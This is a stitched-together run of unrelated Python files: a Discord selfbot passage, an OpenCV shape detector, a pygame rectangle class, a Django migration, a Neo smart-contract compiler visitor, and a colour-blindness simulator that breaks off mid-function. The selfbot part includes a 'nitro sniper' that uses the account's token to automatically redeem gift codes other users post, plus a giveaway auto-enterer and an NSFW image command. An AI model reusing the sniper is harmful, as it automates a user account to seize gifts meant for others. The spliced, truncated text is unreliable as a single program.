        except Exception as error:
            errorprint("Exception ' {0} ', user not found?".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

@bot.command()
async def slap(ctx, user: discord.User=None):
    # Post a "slap" reaction image mentioning *user* (same template as kiss).
    await ctx.message.delete()
    commandprint("Command 'slap' has been used by " + bot.user.name)
    if user is None:
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "slap @Flairings", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            r = requests.get("https://nekos.life/api/v2/img/slap")
            res = r.json()
            em = discord.Embed(description=user.mention, colour=color)
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', user not found?".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

@bot.command()
async def img(ctx, text: str):
    # Fetch an arbitrary nekos.life image category named by *text*;
    # "help" additionally lists the known category names first.
    await ctx.message.delete()
    # NOTE(review): *text* is a required positional, so discord.py raises
    # MissingRequiredArgument before this body runs when it is omitted --
    # this None branch is presumably dead; confirm against the error handler.
    if text is None:
        embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "img help", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            commandprint("Command 'img' has been used by " + bot.user.name + " with a message of " + text)
            # Known nekos.life endpoint names (shown by the "help" branch).
            possible = [ 'feet', 'yuri', 'trap', 'futanari', 'hololewd', 'lewdkemo', 'solog', 'feetg', 'cum', 'erokemo', 'les', 'wallpaper', 'lewdk', 'ngif', 'tickle', 'lewd', 'feed', 'gecg', 'eroyuri', 'eron', 'cum_jpg', 'bj', 'nsfw_neko_gif', 'solo', 'kemonomimi', 'nsfw_avatar', 'gasm', 'poke', 'anal', 'slap', 'hentai', 'avatar', 'erofeet', 'holo', 'keta', 'blowjob', 'pussy', 'tits', 'holoero', 'lizard', 'pussy_jpg', 'pwankg', 'classic', 'kuni', 'waifu', 'pat', '8ball', 'kiss', 'femdom', 'neko', 'spank', 'cuddle', 'erok', 'fox_girl', 'boobs', 'random_hentai_gif', 'smallboobs', 'hug', 'ero', 'smug', 'goose', 'baka', 'woof' ]
            if text == "help":
                em = discord.Embed(title='List of images', color=color)
                em.description = "{}".format(possible)
                em.set_footer(text=footer)
                await ctx.send(embed=em, delete_after=deletetimer)
            # NOTE(review): "help" falls through and still requests
            # /img/help below; the KeyError handler then swallows the
            # missing 'url' key -- confirm this is intentional.
            r = requests.get("https://nekos.life/api/v2/img/" + text)
            res = r.json()
            em = discord.Embed()
            em.set_footer(text=footer)
            em.set_image(url=res['url'])
            await ctx.send(embed=em, delete_after=deletetimer)
        except KeyError:
            # Raised when the API response has no 'url' (unknown category).
            commandprint("KeyError has been triggerd.")

@bot.command(pass_context=True)
async def info(ctx):
    # Report bot status: version, uptime (since module-level start_time),
    # latency, prefix, command count, config name and sniper toggles.
    await ctx.message.delete()
    commandprint("Command 'info' has been used by " + bot.user.name)
    try:
        currenttime = time.time()
        # Uptime rendered as H:MM:SS via timedelta's str().
        difference = int(round(currenttime - start_time))
        text = str(datetime.timedelta(seconds=difference))
        # NOTE(review): delete_after is not a documented Embed kwarg --
        # presumably ignored here; the actual auto-delete is on ctx.send.
        embed=discord.Embed(title=f"**BOT INFORMATION**", description="", color=color, delete_after=deletetimer)
        embed.add_field(name="**VERSION**", value=version, inline=False)
        embed.add_field(name="**UPTIME**", value=text, inline=False)
        embed.add_field(name="**PING**", value=f"{round(ctx.bot.latency * 1000)}ms", inline=False)
        embed.add_field(name="**PREFIX**", value=prefix, inline=False)
        embed.add_field(name="**COMMANDS**", value="" + str(amountofcommands), inline=False)
        embed.add_field(name="**CONFIG**", value=f"{config_name}", inline=False)
        # Config flags are stored as the strings "true"/"false".
        if nitrosniper == "true":
            embed.add_field(name="**NITRO SNIPER**", value="Enabled", inline=False)
        else:
            embed.add_field(name="**NITRO SNIPER**", value="Disabled", inline=False)
        if giveawaysniper == "true":
            embed.add_field(name="**GIVEAWAY SNIPER**", value="Enabled", inline=False)
        else:
            embed.add_field(name="**GIVEAWAY SNIPER**", value="Disabled", inline=False)
        embed.set_footer(icon_url=bot.user.avatar_url, text="Logged in as: " + bot.user.name)
        await ctx.send(embed=embed, delete_after=deletetimer)
    except Exception as error:
        errorprint("Exception ' {0} ', user not found?".format(error))
        em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
        await ctx.send(embed=em,
delete_after=deletetimer)

# Feature toggle for saving DM attachments to disk (string flag, like the
# other config switches in this file).
download_attachments = "true"

# Load the bad-word list once at import time.  Note the handle is rebound to
# the resulting list of words inside the with-block (the file is still closed
# correctly by the context manager).
with open('data/blacklisted words/badwords.txt') as bad_words_list:
    bad_words_list = bad_words_list.read().split()

@bot.event
async def on_message(message):
    # Central message hook: (1) archive DM attachments, (2) auto-delete own
    # messages containing bad words, (3) nitro-gift sniping, (4) giveaway
    # sniping.  Must end by forwarding to process_commands or commands break.
    # download attachments
    if download_attachments == "true":
        guild = message.guild
        # Only messages outside a guild (DMs) from other users are saved.
        if not guild:
            if message.author.id != bot.user.id:
                if message.attachments:
                    # Only the first attachment of the message is saved.
                    await message.attachments[0].save(f'data/attachments/{message.attachments[0].id}-{message.attachments[0].filename}')
                    eventprint(f'Downloaded {message.attachments[0].filename} from: {message.channel}')
    # case deletion
    # Selfbot: checks the account's OWN messages for prohibited words and
    # deletes them after a 60-second grace period.
    if message.author.id == bot.user.id:
        for badword in bad_words_list:
            if badword in message.content.lower():
                detection(bot.user.name + " said a prohibited word '" + badword + "' in '" + message.content + "', deleting in 60 seconds.")
                await asyncio.sleep(60)
                await message.delete()
                detection("Message '" + message.content + "' deleted.")
    # NITRO SNIPER
    if nitrosniper == "true":
        try:
            # Raises AttributeError (caught below) when no gift link matches.
            code = re.search(r'(discord.gift|discordapp.com/gifts)/\w{16,24}', message.content).group(0)
            # Local start_time for the redemption delay measurement
            # (shadows the module-level start_time inside this function).
            start_time = time.time()
            def returnData(status, code):
                # Log the redemption outcome with a colour-coded status.
                # NOTE(review): `status == 'INVALID CODE' or 'DENIED'` is
                # always truthy ('DENIED' is a non-empty string), so every
                # status is printed red -- likely meant
                # `status in ('INVALID CODE', 'DENIED')`; same flaw in the
                # elif.  Left as-is (comment-only pass).
                if status == 'INVALID CODE' or 'DENIED':
                    perhaps = Fore.RED
                elif status == 'ALREADY REDEEMED' or 'RATELIMITED' or 'UNKNOWN':
                    perhaps = Fore.YELLOW
                else:
                    perhaps = Fore.GREEN
                delay = (time.time() - start_time)
                sniperprint(Fore.RESET + "[" + perhaps + status + Fore.RESET + "]" + " - " + "[" + Fore.CYAN + code + Fore.RESET + "]" + f" | {message.guild} | {message.author} |" + Fore.RED + " DELAY: " + "%.3fs" % delay)
            # Known Discord API error payloads, matched by substring below.
            errors = {
                1: '{"message": "Unknown Gift Code", "code": 10038}',
                2: '{"message": "This gift has been redeemed already.", "code": 50050}',
                3: 'You are being rate limited',
                4: 'Access denied'
            }
            payload = {
                'channel_id': None,
                'payment_source_id': None
            }
            headers = {
                'Content-Type': 'application/json',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.306 Chrome/78.0.3904.130 Electron/7.1.11 Safari/537.36',
                'Authorization': nitrosniperredeem
            }
            session = requests.Session()
            # Attempt to redeem the gift code with the configured token.
            r = session.post(f'https://discordapp.com/api/v6/entitlements/gift-codes/{code.replace("discord.gift/", "")}/redeem', headers=headers, json=payload)
            if errors[1] in r.text:
                returnData('INVALID CODE', code)
                # The inner try falls back to guild.id when formatting the
                # guild name raises (e.g. in DMs).
                try:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[WARN] Invalid Code {code} | {message.guild} | {message.author}' + '\n')
                except:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[WARN] Invalid Code {code} | {message.guild.id} | {message.author}' + '\n')
            elif errors[2] in r.text:
                returnData('ALREADY REDEEMED', code)
                try:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[INFO] Already redeemed Code {code} | {message.guild} | {message.author}' + '\n')
                except:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[INFO] Already redeemed Code {code} | {message.guild.id} | {message.author}' + '\n')
            elif errors[3] in r.text:
                returnData('RATELIMITED', code)
                open('data/nitro/nitro-logs.txt', 'a+').write(f'[WARN] RateLimited' + '\n')
            elif errors[4] in r.text:
                returnData('DENIED', code)
                open('data/nitro/nitro-logs.txt', 'a+').write(f'[WARN] Denied' + '\n')
            else:
                # Any other response is treated as a successful claim.
                returnData('CLAIMED', code)
                try:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[SUCCESS] Claimed Code {code} | {message.guild} | {message.author} | {r.text}' + '\n')
                except:
                    open('data/nitro/nitro-logs.txt', 'a+').write(
                        f'[SUCCESS] Claimed Code {code} | {message.guild.id} | {message.author} | {r.text}' + '\n')
        except AttributeError:
            # re.search found no gift link in this message: nothing to do.
            pass
    if giveawaysniper == "true":
        # Heuristic giveaway detection: either an announcement to react to,
        # or a mention of this account declaring it the winner.
        if '**giveaway**' in str(message.content).lower() or ('react with' in str(message.content).lower() and 'giveaway' in str(message.content).lower()):
            try:
                # Delay the reaction to look less bot-like.
                await asyncio.sleep(giveawaysniperdelay)
                await message.add_reaction("🎉")
                sniperprint("Giveaway entered" + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET)
            except:
                sniperprint("Failed to enter Giveaway" + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET)
        elif '<@' + str(bot.user.id) + '>' in message.content and ('giveaway' in str(message.content).lower() or 'won' in message.content or 'winner' in str(
                message.content).lower()):
            try:
                # Extract the prize name from "You won the **<prize>**".
                won = re.search("You won the \*\*(.*)\*\*", message.content).group(1)
            except:
                won = "UNKNOWN"
            sniperprint("Congratulations! You won a Giveaway: " + Fore.LIGHTCYAN_EX + won + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET)
    # Required so prefixed commands still dispatch after this event handler.
    await bot.process_commands(message)

login()
# Simple shape detection script: threshold an image, approximate each contour
# as a polygon, and label it by its vertex count.
# NOTE: a square cannot be distinguished from a rectangle this way (both have
# 4 vertices), hence the combined 'rectangle/square' label.
import cv2 as cv

img = cv.imread('shapes2.jpg')
if img is None:
    # imread returns None instead of raising when the file is missing/unreadable.
    raise FileNotFoundError("shapes2.jpg could not be read")

# Binary mask separating the shapes from the light (>240) background.
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, thresh = cv.threshold(gray, 240, 255, cv.THRESH_BINARY)
contours, _ = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_NONE)

# Vertex count of the approximated polygon -> label.  Anything not listed
# (smooth, many-vertex contours) is treated as a circle.
# BUG FIX: 7 vertices was previously labelled 'octav' (octagon has 8);
# a 7-gon is a heptagon.
LABELS = {
    3: 'triangle',
    4: 'rectangle/square',
    5: 'pentagon',
    6: 'hexagon',
    7: 'heptagon',
    10: 'star',
}

for contour in contours:
    # Approximate with a tolerance of 1% of the contour's perimeter.
    approx = cv.approxPolyDP(contour, 0.01 * cv.arcLength(contour, True), True)
    cv.drawContours(img, [approx], 0, (0, 0, 0), 5)
    # Anchor the label at the first vertex, slightly above the shape.
    x = approx.ravel()[0]
    y = approx.ravel()[1]
    label = LABELS.get(len(approx), 'circle')
    cv.putText(img, label, (x, y - 10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2)

# BUG FIX: cv.resize is not in-place and its result was discarded, so the
# shrink never happened.  Also, dsize is (width, height) = (shape[1], shape[0]);
# the original passed them swapped.
img = cv.resize(img, (img.shape[1] // 3, img.shape[0] // 3))
cv.imshow('shapes', img)
cv.waitKey(0)
cv.destroyAllWindows()
import math  # BUG FIX: collision_logic_c calls math.sqrt but math was never imported

import pygame
from random import randint


class Rectangle:
    """An axis-aligned rectangle that bounces around inside a fixed screen.

    The rectangle's own size, velocity and colour are randomised on
    construction; the ``width``/``height`` constructor arguments are the
    dimensions of the screen the rectangle is confined to (kept under those
    names for caller compatibility).
    """

    def __init__(self, x, y, width, height):
        self.x = x
        self.y = y
        # Own size is random (20..100); width/height args are screen bounds.
        self.width = randint(20, 100)
        self.height = randint(20, 100)
        self.top = y
        self.bottom = y + self.height
        self.left = x
        self.right = x + self.width
        # Corner points, clockwise from the top-left.
        self.points = [(x, y), (self.right, y), (self.right, self.bottom), (x, self.bottom)]
        self.dx = randint(-20, 20)
        self.dy = randint(-20, 20)
        self.color = (randint(0, 255), randint(0, 255), randint(0, 255))
        self.screen_width = width
        self.screen_height = height

    def paint(self, surface):
        """Draw the rectangle onto *surface*."""
        pygame.draw.rect(surface, self.color, (self.x, self.y, self.width, self.height))

    def move_logic(self):
        """Advance one step, reflecting the velocity at the screen edges."""
        if self.x + self.width >= self.screen_width:
            self.dx *= -1
        if self.x <= 0:
            self.dx *= -1
        if self.y + self.height >= self.screen_height:
            self.dy *= -1
        if self.y <= 0:
            self.dy *= -1
        self.x += self.dx
        self.y += self.dy
        # Keep the cached edges/corners in sync with the new position.
        self.top = self.y
        self.bottom = self.y + self.height
        self.left = self.x
        self.right = self.x + self.width
        self.points = [(self.x, self.y), (self.right, self.y), (self.right, self.bottom), (self.x, self.bottom)]

    def collision_logic_c(self, shape):
        """Return True if circle *shape* (attributes x, y, radius) touches
        any edge of this rectangle, else False.

        Walks the rectangle's edges as consecutive corner pairs; vertical and
        horizontal edges are intersected with the circle analytically, any
        other segment falls back to a closest-point distance test.
        """
        self_x1, self_y1 = self.points[len(self.points) - 1]
        for self_x2, self_y2 in self.points:
            if self_x1 - self_x2 == 0:
                # Vertical edge x == self_x1: circle close enough to reach it?
                if (shape.x - self_x1)**2 <= shape.radius**2:
                    temp_points = {}
                    # y-coordinates where the circle crosses the edge's line.
                    temp_y1 = shape.y - math.sqrt(shape.radius**2 - (shape.x - self_x1)**2)
                    temp_y2 = shape.y + math.sqrt(shape.radius**2 - (shape.x - self_x1)**2)
                    if temp_y1 < max(self_y1, self_y2) and temp_y1 > min(self_y1, self_y2):
                        temp_points["y1"] = temp_y1
                    if temp_y2 < max(self_y1, self_y2) and temp_y2 > min(self_y1, self_y2):
                        temp_points["y2"] = temp_y2
                    if len(temp_points) > 0:
                        return True
            elif self_y1 - self_y2 == 0:
                # Horizontal edge y == self_y1.
                if (shape.y - self_y1)**2 <= shape.radius**2:
                    temp_points = {}
                    # BUG FIX: the crossing x-coordinates must be centred on
                    # the circle's x (shape.x); the original used shape.y,
                    # asymmetric with the (correct) vertical-edge branch.
                    temp_x1 = shape.x - math.sqrt(shape.radius**2 - (shape.y - self_y1)**2)
                    temp_x2 = shape.x + math.sqrt(shape.radius**2 - (shape.y - self_y1)**2)
                    if temp_x1 < max(self_x1, self_x2) and temp_x1 > min(self_x1, self_x2):
                        temp_points["x1"] = temp_x1
                    if temp_x2 < max(self_x1, self_x2) and temp_x2 > min(self_x1, self_x2):
                        temp_points["x2"] = temp_x2
                    if len(temp_points) > 0:
                        return True
            else:
                # General segment: distance from the circle centre to the
                # closest point on the segment (u clamped to [0, 1]).
                px = self_x2 - self_x1
                py = self_y2 - self_y1
                temp = px * px + py * py
                u = ((shape.x - self_x1) * px + (shape.y - self_y1) * py) / float(temp)
                if u > 1:
                    u = 1
                elif u < 0:
                    u = 0
                x = self_x1 + u * px
                y = self_y1 + u * py
                dx = x - shape.x
                dy = y - shape.y
                dist = math.sqrt(dx * dx + dy * dy)
                if dist <= shape.radius:
                    return True
            self_x1, self_y1 = self_x2, self_y2
        return False
# Generated by Django 3.1.2 on 2021-03-26 18:53 from django.db import migrations, models import lfs.core.fields.thumbs class Migration(migrations.Migration): dependencies = [ ('manufacturer', '0002_auto_20150428_2039'), ] operations = [ migrations.AlterField( model_name='manufacturer', name='image', field=lfs.core.fields.thumbs.ImageWithThumbsField(blank=True, null=True, sizes=((60, 60), (100, 100), (200, 200), (400, 400)), upload_to='images', verbose_name='Image'), ), migrations.AlterField( model_name='manufacturer', name='meta_title', field=models.CharField(default='<name>', max_length=100, verbose_name='Meta title'), ), ]
import ast
from typing import Dict, Tuple

from boa3.compiler.codegenerator import CodeGenerator
from boa3.model.method import Method
from boa3.model.operation.binary.binaryoperation import BinaryOperation
from boa3.model.operation.binaryop import BinaryOp
from boa3.model.operation.unary.unaryoperation import UnaryOperation
from boa3.model.symbol import ISymbol
from boa3.model.type.itype import IType
from boa3.model.type.type import Type
from boa3.model.variable import Variable


class VisitorCodeGenerator(ast.NodeVisitor):
    """
    This class is responsible for walking through the ast.

    The methods with the name starting with 'visit_' are implementations of methods from the
    :class:`NodeVisitor` class. These methods are used to walk through the Python abstract syntax tree.

    :ivar generator: the code generator that emits the Neo VM opcodes for each visited node
    """

    def __init__(self, generator: CodeGenerator):
        self.generator = generator

    @property
    def symbols(self) -> Dict[str, ISymbol]:
        # Shortcut to the generator's symbol table (name -> symbol).
        return self.generator.symbol_table

    def visit_to_generate(self, node: ast.AST):
        """
        Visitor to generate the nodes that the primary visitor is used to retrieve value

        :param node: an ast node
        """
        result = self.visit(node)
        # the default return of the name visitor is the name string
        if isinstance(node, ast.Name):
            # TODO: validate function calls
            self.generator.convert_load_symbol(result)

    def visit_FunctionDef(self, function: ast.FunctionDef):
        """
        Visitor of the function definition node.

        Generates the Neo VM code for the function.

        :param function: the python ast function definition node
        """
        method = self.symbols[function.name]

        # A missing return annotation is treated as returning None.
        if function.returns is not None:
            fun_rtype_id: str = self.visit(function.returns)
        else:
            fun_rtype_id: str = Type.none.identifier

        symbol: ISymbol = self.generator.get_symbol(fun_rtype_id)
        # Only generate code when the symbol table has a real Method whose
        # return annotation resolves to a known type.
        if isinstance(method, Method) and isinstance(symbol, IType):
            fun_return: IType = symbol
            method.return_type = fun_return

            self.generator.convert_begin_method(method)

            for stmt in function.body:
                self.visit(stmt)

            self.generator.convert_end_method()

    def visit_arguments(self, arguments: ast.arguments) -> Dict[str, Variable]:
        """
        Visitor of the function arguments node

        :param arguments: the python ast function arguments node
        :return: a dictionary that maps each argument to its identifier
        """
        args: Dict[str, Variable] = {}

        for arg in arguments.args:
            var_id, var = self.visit_arg(arg)   # Tuple[str, Variable]
            args[var_id] = var
        return args

    def visit_arg(self, arg: ast.arg) -> Tuple[str, Variable]:
        """
        Visitor of a function argument node

        :param arg: the python ast arg node
        :return: a tuple with the identifier and the argument
        """
        var_id = arg.arg
        var_type = self.visit(arg.annotation)
        return var_id, Variable(var_type)

    def visit_Return(self, ret: ast.Return):
        """
        Visitor of a function return node

        :param ret: the python ast return node
        """
        # Bare `return` (no value) emits nothing here; the method epilogue
        # is produced by convert_end_method.
        if ret.value is not None:
            self.visit_to_generate(ret.value)

    def store_variable(self, var_id: str, value: ast.AST, index: ast.AST = None):
        """Emit the code that stores *value* into *var_id* (or *var_id[index]*)."""
        # if the value is None, it is a variable declaration
        if value is not None:
            if index is None:
                # if index is None, then it is a variable assignment
                self.visit_to_generate(value)
                self.generator.convert_store_variable(var_id)
            else:
                # if not, it is an array assignment
                self.generator.convert_load_symbol(var_id)
                self.visit_to_generate(index)
                self.visit_to_generate(value)
                self.generator.convert_set_array_item()

    def visit_AnnAssign(self, ann_assign: ast.AnnAssign):
        """
        Visitor of an annotated assignment node

        :param ann_assign: the python ast variable assignment node
        """
        var_id = self.visit(ann_assign.target)
        self.store_variable(var_id, ann_assign.value)

    def visit_Assign(self, assign: ast.Assign):
        """
        Visitor of an assignment node

        :param assign: the python ast variable assignment node
        """
        var_index = None
        var_id = self.visit(assign.targets[0])

        # if it is a tuple, then it is an array assignment
        # (visit_Subscript returns (identifier, slice) for a Store context)
        if isinstance(var_id, tuple):
            var_index = var_id[1]
            var_id: str = var_id[0]

        self.store_variable(var_id, assign.value, var_index)

    def visit_Subscript(self, subscript: ast.Subscript):
        """
        Visitor of a subscript node

        :param subscript: the python ast subscript node
        """
        if isinstance(subscript.ctx, ast.Load):
            # get item
            self.visit_to_generate(subscript.value)
            self.visit_to_generate(subscript.slice.value)
            self.generator.convert_get_array_item()
        else:
            # set item: defer the emission to store_variable via visit_Assign
            var_id = self.visit(subscript.value)
            return var_id, subscript.slice.value

    def visit_BinOp(self, bin_op: ast.BinOp):
        """
        Visitor of a binary operation node

        :param bin_op: the python ast binary operation node
        """
        # NOTE(review): the `op` node is expected to have been replaced by a
        # BinaryOperation in an earlier analysis pass — confirm upstream.
        if isinstance(bin_op.op, BinaryOperation):
            self.visit_to_generate(bin_op.left)
            self.visit_to_generate(bin_op.right)
            self.generator.convert_operation(bin_op.op)

    def visit_UnaryOp(self, un_op: ast.UnaryOp):
        """
        Visitor of a unary operation node

        :param un_op: the python ast unary operation node
        """
        if isinstance(un_op.op, UnaryOperation):
            self.visit_to_generate(un_op.operand)
            self.generator.convert_operation(un_op.op)

    def visit_Compare(self, compare: ast.Compare):
        """
        Visitor of a compare operation node

        :param compare: the python ast compare operation node
        """
        converted: bool = False
        left = compare.left
        for index, op in enumerate(compare.ops):
            right = compare.comparators[index]
            if isinstance(op, BinaryOperation):
                self.visit_to_generate(left)
                self.visit_to_generate(right)
                self.generator.convert_operation(op)
                # if it's more than two comparators, must include AND between the operations
                if not converted:
                    converted = True
                else:
                    self.generator.convert_operation(BinaryOp.And)
            left = right

    def visit_BoolOp(self, bool_op: ast.BoolOp):
        """
        Visitor of a boolean operation node

        :param bool_op: the python ast boolean operation node
        """
        if isinstance(bool_op.op, BinaryOperation):
            # Fold the n-ary and/or left to right: emit the first operand,
            # then one operation per remaining operand.
            left = bool_op.values[0]
            self.visit_to_generate(left)
            for index, right in enumerate(bool_op.values[1:]):
                self.visit_to_generate(right)
                self.generator.convert_operation(bool_op.op)

    def visit_While(self, while_node: ast.While):
        """
        Generates the Neo VM code for a while statement

        :param while_node: the python ast while statement node
        """
        # The body is emitted first, then the test; convert_end_while wires
        # the jump addresses so the test runs before each iteration.
        start_addr: int = self.generator.convert_begin_while()
        for stmt in while_node.body:
            self.visit_to_generate(stmt)

        test_address: int = self.generator.address
        self.visit_to_generate(while_node.test)
        self.generator.convert_end_while(start_addr, test_address)

        # `while ... else` body runs after the loop exits normally.
        for stmt in while_node.orelse:
            self.visit_to_generate(stmt)

    def visit_If(self, if_node: ast.If):
        """
        Generates the Neo VM code for an if statement

        :param if_node: the python ast if statement node
        """
        self.visit_to_generate(if_node.test)

        start_addr: int = self.generator.convert_begin_if()
        for stmt in if_node.body:
            self.visit_to_generate(stmt)

        if len(if_node.orelse) > 0:
            # convert_begin_else returns the address the final end-if patch
            # must use once an else branch exists.
            start_addr = self.generator.convert_begin_else(start_addr)
            for stmt in if_node.orelse:
                self.visit_to_generate(stmt)

        self.generator.convert_end_if(start_addr)

    def visit_IfExp(self, if_node: ast.IfExp):
        """
        Generates the Neo VM code for an if expression (ternary)

        :param if_node: the python ast if expression node
        """
        self.visit_to_generate(if_node.test)

        start_addr: int = self.generator.convert_begin_if()
        self.visit_to_generate(if_node.body)

        start_addr = self.generator.convert_begin_else(start_addr)
        self.visit_to_generate(if_node.orelse)
        self.generator.convert_end_if(start_addr)

    def visit_Name(self, name: ast.Name) -> str:
        """
        Visitor of a name node

        :param name: the python ast name identifier node
        :return: the identifier of the name
        """
        return name.id

    def visit_NameConstant(self, constant: ast.NameConstant):
        """
        Visitor of constant names node (True/False/None)

        :param constant: the python ast name constant node
        """
        self.generator.convert_literal(constant.value)

    def visit_Num(self, num: ast.Num):
        """
        Visitor of literal number node

        :param num: the python ast number node
        """
        self.generator.convert_literal(num.n)

    def visit_Str(self, str: ast.Str):
        """
        Visitor of literal string node

        :param str: the python ast string node
        """
        # NOTE(review): the parameter shadows the builtin `str`; harmless
        # here but a candidate for renaming.
        self.generator.convert_literal(str.s)

    def visit_Tuple(self, tup_node: ast.Tuple):
        """
        Visitor of literal tuple node

        :param tup_node: the python ast tuple node
        """
        # NOTE(review): `tup` is never used afterwards — dead code candidate.
        tup = tuple([value for value in tup_node.elts])
        length = len(tup_node.elts)
        self.generator.convert_new_array(length)
        for index, value in enumerate(tup_node.elts):
            # Emit index first, then the value, then the set-item opcode.
            self.generator.convert_set_new_array_item_at(index)
            self.visit_to_generate(value)
            self.generator.convert_set_array_item()
""" Adapted from "The Color Blind Simulation function" by Matthew Wickline and the Human - Computer Interaction Resource Network (http://hcirn.com/), 2000 - 2001. """ import numpy as np rBlind = { "protan": {"cpu": 0.735, "cpv": 0.265, "am": 1.273463, "ayi": -0.073894}, "deutan": {"cpu": 1.14, "cpv": -0.14, "am": 0.968437, "ayi": 0.003331}, "tritan": {"cpu": 0.171, "cpv": -0.003, "am": 0.062921, "ayi": 0.292119}, } def rgb2xyz(rgb): r = rgb[0] g = rgb[1] b = rgb[2] x = 0.430574 * r + 0.341550 * g + 0.178325 * b y = 0.222015 * r + 0.706655 * g + 0.071330 * b z = 0.020183 * r + 0.129553 * g + 0.939180 * b return x, y, z def xyz2rgb(xyz): x = xyz[0] y = xyz[1] z = xyz[2] r = 3.063218 * x - 1.393325 * y - 0.475802 * z g = -0.969243 * x + 1.875966 * y + 0.041555 * z b = 0.067871 * x - 0.228834 * y + 1.069251 * z return r, g, b def anomylize(a, b): v = 1.75 d = v * 1 + 1 return ( (v * b[0] + a[0] * 1) / d, (v * b[1] + a[1] * 1) / d, (v * b[2] + a[2] * 1) / d, ) def monochrome(rgb): z = rgb[0] * 0.299 + rgb[1] * 0.587 + rgb[2] * 0.114 return z, z, z def blindMK(rgb, t): gamma = 2.2 wx = 0.312713 wy = 0.329016 wz = 0.358271 r = rgb[0] g = rgb[1] b = rgb[2] c_rgb = (r ** gamma, g ** gamma, b ** gamma) c_xyz = rgb2xyz(c_rgb) sum_xyz = sum(c_xyz) c_u = 0 c_v = 0 if sum_xyz != 0: c_u = c_xyz[0] / sum_xyz c_v = c_xyz[1] / sum_xyz nx = wx * c_xyz[1] / wy nz = wz * c_xyz[1] / wy d_y = 0 if c_u < rBlind[t]["cpu"]: clm = (rBlind[t]["cpv"] - c_v) / (rBlind[t]["cpu"] - c_u) else: clm = (c_v - rBlind[t]["cpv"]) / (c_u - rBlind[t]["cpu"]) clyi = c_v - c_u * clm d_u = (rBlind[t]["ayi"] - clyi) / (clm - rBlind[t]["am"]) d_v = (clm * d_u) + clyi s_x = d_u * c_xyz[1] / d_v s_y = c_xyz[1] s_z = (1 - (d_u + d_v)) * c_xyz[1] / d_v s_rgb = xyz2rgb((s_x, s_y, s_z)) d_x = nx - s_x d_z = nz - s_z d_rgb = xyz2rgb((d_x, d_y, d_z)) if d_rgb[0]: const = 0 if s_rgb[0] < 0 else 1 adjr = (const - s_rgb[0]) / d_rgb[0] else: adjr = 0 if d_rgb[1]: const = 0 if s_rgb[1] < 0 else 1 adjg = (const - s_rgb[1]) 
/ d_rgb[1] else: adjg = 0 if d_rgb[2]: const = 0 if s_rgb[2] < 0 else 1 adjb = (const - s_rgb[2]) / d_rgb[2] else: adjb = 0 adjust = max( [ 0 if adjr > 1 or adjr < 0 else adjr, 0 if adjg > 1 or adjg < 0 else adjg, 0 if adjb > 1 or adjb < 0 else adjb, ] ) s_r = s_rgb[0] + (adjust * d_rgb[0]) s_g = s_rgb[1] + (adjust * d_rgb[1]) s_b = s_rgb[2] + (adjust * d_rgb[2]) def z(v): if v <= 0: const = 0.0 elif v >= 1: const = 1.0 else: const = v ** (1 / gamma) return const return z(s_r), z(s_g), z(s_b) fBlind = { "Normal": lambda v: v, "Protanopia": lambda v: blindMK(v, "protan"), "Protanomaly": lambda v: anomylize(v, blindMK(v, "protan")), "Deuteranopia": lambda v: blindMK(v, "deutan"), "Deuteranomaly": lambda v: anomylize(v, blindMK(v, "deutan")), "Tritanopia": lambda v: blindMK(v, "tritan"), "Tritanomaly": lambda v: anomylize(v, blindMK(v, "tritan")), "Achromatopsia": lambda v: monochrome(v), "Achromatomaly": lambda v: anomylize(v, monochrome(v)), } # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
def simulate_image(img_path, colorblind_type):
    """
    Display an image side by side with a simulation of how it appears to a
    person with the given type of colourblindness.

    :param img_path: path of the image file to load with matplotlib.
    :param colorblind_type: Type of colourblindness to simulate, can be:

        * 'Normal': Normal vision
        * 'Protanopia': Red-green colorblindness (1% males)
        * 'Protanomaly': Red-green colorblindness (1% males, 0.01% females)
        * 'Deuteranopia': Red-green colorblindness (1% males)
        * 'Deuteranomaly': Red-green colorblindness (most common type: 6% males, 0.4% females)
        * 'Tritanopia': Blue-yellow colourblindness (<1% males and females)
        * 'Tritanomaly': Blue-yellow colourblindness (0.01% males and females)
        * 'Achromatopsia': Total colourblindness
        * 'Achromatomaly': Total colourblindness

    :return: None; shows a matplotlib figure.
    """
    import matplotlib.image as mpimg
    import matplotlib.pyplot as plt

    filter_function = fBlind[colorblind_type]

    img = mpimg.imread(img_path)

    n_rows = img.shape[0]
    n_columns = img.shape[1]

